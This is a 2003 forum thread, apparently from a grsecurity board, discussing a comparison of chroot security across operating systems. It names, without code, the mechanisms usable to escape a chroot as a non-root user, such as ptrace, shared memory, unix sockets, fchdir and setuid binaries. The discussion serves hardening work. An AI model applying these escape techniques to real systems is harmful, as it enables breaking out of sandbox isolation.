Page 1 of 1
comparison over systems
Posted:
Mon Apr 07, 2003 4:59 pmby blackmage
little comments about the compare page
main ones about chroot: in term of security, chroot seems to me as useless if you use it as root (speaking of user in chroot)
the regression test or only chroot and make their test code. For example, on openbsd, all chroot (default httpd, named) are used as common user (setuid/setgid) so most of tests will be successful i think if uid changed (test both?).
about dmesg, i believe it to be mainly a perm problem (bsd: /dev/kmem, /var/log/dmesg.boot, dmesg bin)
else no more comments. yours ?
Posted:
Mon Apr 07, 2003 5:54 pmby spender
Three of the regression tests on there can be launched as non-root to break the chroot, and they will happily run on the other OSes.
-Brad
Posted:
Mon Apr 07, 2003 6:38 pmby spender
To clarify, three of the tests can be used regardless of the quality of the code within the chroot. At least 2 other attacks can be launched if the chrooted application isn't written correctly.
-Brad
Posted:
Tue Apr 08, 2003 3:46 amby blackmage
i've test chroot_chroot test on openbsd by adding a ret = setuid(-1); before test and it passed.
to which test do you refer ?
if i remember well, chroot, mknod need root access. for others, i'm not sure.
in any case, any poorly written app is unsecure, we try speaking of the good ones (i hope
)
Posted:
Tue Apr 08, 2003 8:55 amby spender
Of course it passed when you did the setuid. Only root is allowed to chroot. I've explained above which tests can be launched as non-root. I've worked on this stuff for over 2 years now, so I know what I'm doing. In fact, I've written a paper on breaking chroot, however I cannot publish it myself (it is intended for a magazine).
BTW: do you see any irony in your last statement? If all your apps are secure, there is no need for chroot, now is there?
-Brad
Posted:
Tue Apr 08, 2003 10:48 amby blackmage
Sorry, maybe i need to clean my glasses or too tired, but i not see you mention Which three test can be use as non-root. (i know that mknod/chroot are root restricted)
i'm not saying grsecurity is bad, i use it myself and find it great, but discuss some comparison points.
in which magazine, do you plan to publish ? available on the net ?
it depends: my last sentence was about good apps (a "real" secure app is something rare today) like apache/bind9/etc (not secure, but neither insecure).
Posted:
Tue Apr 08, 2003 10:51 amby spender
ptrace, semaphores, shared memory, message queues, abstract unix domain sockets can all be used as non-root. Fchdir can be used as non-root if the application is written incorrectly.
The article is for a French Linux magazine.
-Brad
Posted:
Tue Apr 08, 2003 10:59 amby spender
In addition, if the attacker has an account on the system by other methods, chmod +s is an easy way to get access to the chrooted UID/GID outside of the chroot.
-Brad
Posted:
Fri Apr 11, 2003 3:02 amby blackmage
ok, thanks a lot, i will take a look
also, one thing i forgot is freebsd jail (which as improved chroot could be more successful in test)